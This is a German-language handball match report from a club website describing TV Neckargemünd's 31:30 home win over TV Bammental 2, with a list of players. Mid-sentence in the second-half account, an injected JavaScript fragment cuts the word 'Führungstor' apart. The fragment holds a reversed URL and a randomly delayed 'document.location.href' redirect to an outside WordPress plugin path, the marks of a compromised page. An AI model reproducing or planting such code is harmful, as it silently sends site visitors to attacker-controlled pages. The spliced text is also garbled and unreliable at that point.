Am frühen Sonntagabend, dem 14.12., stand die erste Herrenmannschaft des TV Neckargemünd sowohl dem Tabellennachbar als auch der Nachbargemeinde aus Bammental gegenüber. Endstand TV Neckargemünd – TV Bammental 2 31:30
Neckargemünd, 14.12.15 (ast) – Trotz vieler Verletzungen und Krankheiten, war die Neckargemünder Bank mit 12 Spielern gut gefüllt. Mit einer zögerlichen und überwiegend schwachen Abwehr wurden dem Gegner zu viele leichte Abschlüsse ermöglicht. So jagte der TVN ständig der 1-Tor-Führung des Gegners hinterher. Technische Fehler prägten das Spiel der Neckargemünder ebenso, wie eine schwache Abwehrleitung. Lediglich der Wille – in den Gesichtern kaum erkennbar – brachte einen Halbzeitendstand von 15:15. Auch Dank einer guten Verwertungsquote bei den Abschlüssen und der Leistung der Neckargemünder Torleute.
Zweite Halbzeit
Die Abwehr stand ein wenig besser, passte sich aber dem rasanteren Spiel der Bammentaler schlecht an. Dank der Torhüter gelang plötzlich die 1-Tor-Führung. Doch es sollte nur kurz währen. Gleich darauf schlichen sich wieder Fehler ein und die Gegner gingen mit 2 Toren in Führung.Das pendelte sich bis in die letzten zehn Minuten ein. Unentschieden – Führung Bammental – … Am Ende passierte es dennoch: Der TVN macht das Führungstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor und kann seine 1-Tor-Führung bis zum Schluss halten. Ein wenig Glück sei Dank.
Es spielten:
Im Feld:
Johannes Hünnerkopf (12), Simon Kronbichler, Niclas Heinze, Nils Berner (4), Michael Lichtl, Alexander Stephan, Andreas Wallstab (2), Jann Thieme (5), Alexander Herd (4), Tomislav Uremovic (4).
Im Tor:
Michael Estl, Jens Ferber.